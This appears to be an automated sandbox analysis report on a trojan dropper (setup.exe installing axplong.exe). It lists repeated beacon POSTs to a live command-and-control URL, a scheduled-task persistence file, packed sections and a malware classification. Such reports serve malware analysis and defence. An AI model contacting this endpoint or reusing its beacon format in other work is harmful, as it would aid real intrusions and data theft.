Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Source: Joe Sandbox View

IP Address: 77.91.77.81 77.91.77.81

Source: Joe Sandbox View

ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 1_2_0100BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

1_2_0100BD30

Source: unknown

HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/
Source: axplong.exe, 00000001.00000002.4114826750.0000000001790000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.000000000170E000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php
Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php2
Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpR-
Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpem32
Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpl
Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpm32
Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpoS
Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptI

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01037D63	1_2_01037D63
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D7C	1_2_01058D7C
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D78	1_2_01058D78
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D88	1_2_01058D88
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D94	1_2_01058D94
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D9C	1_2_01058D9C
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D98	1_2_01058D98
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058DB4	1_2_01058DB4
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_0100E410	1_2_0100E410
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01043048	1_2_01043048
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01004CD0	1_2_01004CD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01048700	1_2_01048700
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_0104775B	1_2_0104775B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01058D9C	1_2_01058D9C
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01042BB0	1_2_01042BB0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_0104763B	1_2_0104763B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01004AD0	1_2_01004AD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_01046EE9	1_2_01046EE9

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9983617230191257
Source: setup.exe	Static PE information: Section: cykfsdxm ZLIB complexity 0.9944855985060347
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983617230191257
Source: axplong.exe.0.dr	Static PE information: Section: cykfsdxm ZLIB complexity 0.9944855985060347

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\8254624243

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe

ReversingLabs: Detection: 72%

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: setup.exe

Static file information: File size 1942016 > 1048576

Source: setup.exe

Static PE information: Raw size of cykfsdxm is bigger than: 0x100000 < 0x1a8a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 1.2.axplong.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 2.2.axplong.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1e9d59 should be: 0x1e0026
Source: setup.exe	Static PE information: real checksum: 0x1e9d59 should be: 0x1e0026

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: cykfsdxm
Source: setup.exe	Static PE information: section name: inbhqvty
Source: setup.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: cykfsdxm
Source: axplong.exe.0.dr	Static PE information: section name: inbhqvty
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 1_2_0101D82C push ecx; ret

1_2_0101D83F

Source: setup.exe	Static PE information: section name: entropy: 7.984381286148552
Source: setup.exe	Static PE information: section name: cykfsdxm entropy: 7.954405328517533
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.984381286148552
Source: axplong.exe.0.dr	Static PE information: section name: cykfsdxm entropy: 7.954405328517533

Source: C:\Users\user\Desktop\setup.exe

